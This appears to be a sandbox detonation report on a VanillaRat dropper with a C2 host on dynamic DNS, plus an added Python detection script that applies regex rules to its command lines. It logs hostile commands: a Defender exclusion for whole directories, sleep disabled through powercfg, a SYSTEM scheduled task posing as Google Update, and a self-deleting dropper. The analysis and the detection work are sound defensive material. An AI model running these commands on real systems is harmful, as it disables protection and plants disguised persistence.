"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"
C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "2392" "1156"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
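The command lines recorded in the two process lists (the Win10 list under behavioral4 above and this Win7 list) spell out the sample's setup sequence: a Defender exclusion covering the whole user profile and Program Files, four powercfg calls that zero the standby and hibernate timeouts so the host never sleeps, a scheduled task named GoogleUpdateTaskMachineQC that runs C:\Program Files\Google\Chrome\updater.exe as SYSTEM at highest run level (created with schtasks.exe when the OS version is below 6.2, with Register-ScheduledTask otherwise; Windows 7 is 6.1, so this run took the schtasks branch, visible as its own process above), an immediate schtasks /run of that task, and a delayed self-delete of the dropper via choice /T 3 & Del. The genuine Google Update tasks are GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA and run GoogleUpdate.exe from Program Files (x86)\Google\Update, so both the task name and the path here are look-alikes.

The script below is an added example, not part of the report; it runs a small set of regex rules over those command lines (copied into SAMPLE_CMDLINES, plus two lines from the same lists that should not fire) the way a detection engineer would over the CommandLine field of Sysmon Event ID 1 or Security 4688 with command-line auditing on. The rule names and the vendor list in the look-alike rule are my own choices.

```python
import re

# Constructed sample input: command lines copied from the two process lists above
# (Win10 and Win7 runs). Indices 7 and 8 are benign lines from the same lists.
SAMPLE_CMDLINES = [
    r'''"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"''',
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force""",
    r"""C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0""",
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }""",
    r'''"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"''',
    r'''C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"''',
    r'''C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"''',
    r"""C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM""",
    r"""choice /C Y /N /D Y /T 3""",
    r"""powercfg /x -hibernate-timeout-ac 0""",
]

# Either task-creation front end: schtasks.exe /create or the ScheduledTasks cmdlet.
TASK_CREATE = re.compile(r'schtasks(\.exe)?"?\s+/create\b|Register-ScheduledTask\b', re.I)

# Each rule fires only when every pattern in its list matches the command line,
# so order-independent combinations (/ru before or after /rl) are handled.
RULES = [
    ("defender_exclusion",
     [re.compile(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b", re.I)]),
    ("defender_exclusion_broad",   # whole profile / Program Files / drive root excluded
     [re.compile(r"Add-MpPreference\b.*?-ExclusionPath\b", re.I),
      re.compile(r"\$env:(UserProfile|ProgramFiles|SystemDrive|SystemRoot|windir)\b"
                 r"|(?<![\w\\])[A-Z]:\\?(?=['\"\s,)])", re.I)]),
    ("powercfg_keep_awake",        # sleep/hibernate timeout set to 0 = never
     [re.compile(r"powercfg(\.exe)?\s+[/-](x|change)\s+-?(standby|hibernate|monitor|disk)-timeout-(ac|dc)\s+0\b", re.I)]),
    ("task_system_highest",        # task runs as SYSTEM at highest run level
     [TASK_CREATE,
      re.compile(r"(/ru|-User)\s+['\"]?(NT AUTHORITY\\)?SYSTEM\b", re.I),
      re.compile(r"/rl\s+highest\b|-RunLevel\s+['\"]?Highest\b", re.I)]),
    ("task_vendor_lookalike_path", # task action lives under a vendor directory (assumed list)
     [TASK_CREATE,
      re.compile(r"Program Files( \(x86\))?\\(Google|Microsoft|Mozilla|Adobe)\\[^'\"]*?\.exe\b", re.I)]),
    ("self_delete_delayed",        # sleep primitive chained with del of an absolute path
     [re.compile(r"\b(choice\s+/C\s+\w\s+/N\s+/D\s+\w\s+/T\s+\d+|ping\s+[-/]n\s+\d+|timeout\s+/t\s+\d+)", re.I),
      re.compile(r"\b(del|erase)\s+(/[a-z]\s+)*['\"]?[A-Z]:\\", re.I)]),
    ("task_run_now",               # persistence triggered without waiting for the next boot/logon
     [re.compile(r'schtasks(\.exe)?"?\s+/run\s+/tn\b', re.I)]),
]


def scan(cmdline):
    """Names of every rule whose patterns all match the command line, in RULES order."""
    return [name for name, pats in RULES if all(p.search(cmdline) for p in pats)]


def scan_all(cmdlines):
    """[(index, [rule, ...])] for the command lines that fired at least one rule."""
    out = []
    for i, cmd in enumerate(cmdlines):
        hits = scan(cmd)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for i, hits in scan_all(SAMPLE_CMDLINES):
        print(f"[{i}] {', '.join(hits)}: {SAMPLE_CMDLINES[i][:90]}")
```

Any one of these rules has benign hits in a real fleet (administrators do zero powercfg timeouts and do create SYSTEM tasks); the value is in the combination within one process tree and in the parent, which here is an unsigned executable under %TEMP%, so in production the rule names would feed a per-tree score rather than fire individually.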
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
Files
memory/1396-0-0x0000000000D60000-0x0000000000D82000-memory.dmp
memory/1396-1-0x00000000740D0000-0x00000000747BE000-memory.dmp
memory/1396-2-0x00000000008E0000-0x0000000000920000-memory.dmp
\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
memory/1396-10-0x00000000740D0000-0x00000000747BE000-memory.dmp
memory/1704-11-0x00000000740D0000-0x00000000747BE000-memory.dmp
memory/1704-12-0x0000000000EC0000-0x0000000000EE2000-memory.dmp
memory/1704-13-0x00000000047D0000-0x0000000004810000-memory.dmp
memory/2580-18-0x000000001B2A0000-0x000000001B582000-memory.dmp
memory/2580-19-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2580-20-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
memory/2580-21-0x00000000027D4000-0x00000000027D7000-memory.dmp
memory/2580-22-0x00000000027DB000-0x0000000002842000-memory.dmp
memory/2620-25-0x0000000076ED0000-0x0000000077079000-memory.dmp
memory/2620-26-0x0000000076CB0000-0x0000000076DCF000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 67199f77f5d63ca7af780de75fae3fbd |
| SHA1 | 8d5550d32903376bc685412979599fcbde2a3170 |
| SHA256 | 3b1be4d7ccc93349a22948d4c0850ea7a53b990b091368000e97e1e46b42b327 |
| SHA512 | 4e8ba2e6331a23668baf1dfecb65f8eae8dce6de9af9edc7c5039e6e1ba9d8a4f129425373bdd0ed46977c9c3e8662ab9c22a5364eea9f70facf7019da28266e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHQ3FLBT3NF46933G7RZ.temp
| MD5 | 67199f77f5d63ca7af780de75fae3fbd |
| SHA1 | 8d5550d32903376bc685412979599fcbde2a3170 |
| SHA256 | 3b1be4d7ccc93349a22948d4c0850ea7a53b990b091368000e97e1e46b42b327 |
| SHA512 | 4e8ba2e6331a23668baf1dfecb65f8eae8dce6de9af9edc7c5039e6e1ba9d8a4f129425373bdd0ed46977c9c3e8662ab9c22a5364eea9f70facf7019da28266e |
memory/2392-34-0x000000001B070000-0x000000001B352000-memory.dmp
memory/420-37-0x0000000000750000-0x0000000000777000-memory.dmp
memory/420-35-0x0000000000720000-0x0000000000741000-memory.dmp
memory/420-28-0x0000000000720000-0x0000000000741000-memory.dmp
memory/2392-38-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/420-40-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/420-41-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/468-42-0x00000000000B0000-0x00000000000D7000-memory.dmp
memory/468-44-0x000007FEBD1F0000-0x000007FEBD200000-memory.dmp
memory/468-46-0x0000000036F10000-0x0000000036F20000-memory.dmp
memory/476-52-0x0000000000160000-0x0000000000187000-memory.dmp
memory/484-60-0x0000000000450000-0x0000000000477000-memory.dmp
memory/484-66-0x0000000036F10000-0x0000000036F20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OutofProcReport259464330.txt
| MD5 | f49f124f7205f3036892ef5c4a93e91a |
| SHA1 | 6d11df08812a6efb24f227c7a03849afd64e3bc6 |
| SHA256 | 176827532d69b3ed443938c14d2ff4ec43d746400306a63dbb5b9e2a7f71de93 |
| SHA512 | 0fe3138b3470c76458ddf0f3d1e94647d61c4a5f491730a74ec20a52437d168a8dae1505a2f99cdc4cec77d2a4f4142124ccd89e1e36cbabb87495549de26338 |
C:\Windows\System32\perfh007.dat
| MD5 | b69ab3aeddb720d6ef8c05ff88c23b38 |
| SHA1 | d830c2155159656ed1806c7c66cae2a54a2441fa |
| SHA256 | 24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625 |
| SHA512 | 4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d |
C:\Windows\System32\perfc007.dat
| MD5 | 0f3d76321f0a7986b42b25a3aa554f82 |
| SHA1 | 7036bba62109cc25da5d6a84d22b6edb954987c0 |
| SHA256 | dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460 |
| SHA512 | bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0 |
C:\Windows\System32\perfc011.dat
| MD5 | 1f998386566e5f9b7f11cc79254d1820 |
| SHA1 | e1da5fe1f305099b94de565d06bc6f36c6794481 |
| SHA256 | 1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea |
| SHA512 | a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f |
C:\Windows\System32\wbem\Performance\WmiApRpl.ini
| MD5 | 46d08e3a55f007c523ac64dce6dcf478 |
| SHA1 | 62edf88697e98d43f32090a2197bead7e7244245 |
| SHA256 | 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614 |
| SHA512 | b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42 |
C:\Windows\System32\perfh00A.dat
| MD5 | 7d0bac4e796872daa3f6dc82c57f4ca8 |
| SHA1 | b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a |
| SHA256 | ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879 |
| SHA512 | 145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e |
C:\Windows\System32\perfh010.dat
| MD5 | 4623482c106cf6cc1bac198f31787b65 |
| SHA1 | 5abb0decf7b42ef5daf7db012a742311932f6dad |
| SHA256 | eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349 |
| SHA512 | afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f |
C:\Windows\System32\perfh011.dat
| MD5 | 54c674d19c0ff72816402f66f6c3d37c |
| SHA1 | 2dcc0269545a213648d59dc84916d9ec2d62a138 |
| SHA256 | 646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5 |
| SHA512 | 4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f |
C:\Windows\System32\perfc010.dat
| MD5 | d73172c6cb697755f87cd047c474cf91 |
| SHA1 | abc5c7194abe32885a170ca666b7cce8251ac1d6 |
| SHA256 | 9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57 |
| SHA512 | 7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6 |
C:\Windows\System32\perfh00C.dat
| MD5 | 5f684ce126de17a7d4433ed2494c5ca9 |
| SHA1 | ce1a30a477daa1bac2ec358ce58731429eafe911 |
| SHA256 | 2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c |
| SHA512 | 4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b |
C:\Windows\System32\perfc00C.dat
| MD5 | ce233fa5dc5adcb87a5185617a0ff6ac |
| SHA1 | 2e2747284b1204d3ab08733a29fdbabdf8dc55b9 |
| SHA256 | 68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31 |
| SHA512 | 1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2 |
C:\Windows\System32\perfc00A.dat
| MD5 | f0ecfbfa3e3e59fd02197018f7e9cb84 |
| SHA1 | 961e9367a4ef3a189466c0a0a186faf8958bdbc4 |
| SHA256 | cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324 |
| SHA512 | 116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294 |
C:\Windows\System32\perfh009.dat
| MD5 | aecab86cc5c705d7a036cba758c1d7b0 |
| SHA1 | e88cf81fd282d91c7fc0efae13c13c55f4857b5e |
| SHA256 | 9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066 |
| SHA512 | e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8 |
Analysis: behavioral6
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win10v2004-20230831-en
Max time kernel
22s
Max time network
79s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3340 created 3276 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3340 set thread context of 796 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\start.bat"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
injector.exe
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
release-v2.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 612 -ip 612
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 488 -p 664 -ip 664
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 60 -ip 60
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xju0d1v2.pjj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win7-20230831-en
Max time kernel
131s
Max time network
144s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2408 wrote to memory of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
Files
\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win10v2004-20230831-en
Max time kernel
141s
Max time network
154s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4500 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
Analysis: behavioral3
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win7-20230831-en
Max time kernel
150s
Max time network
124s
Command Line
Signatures
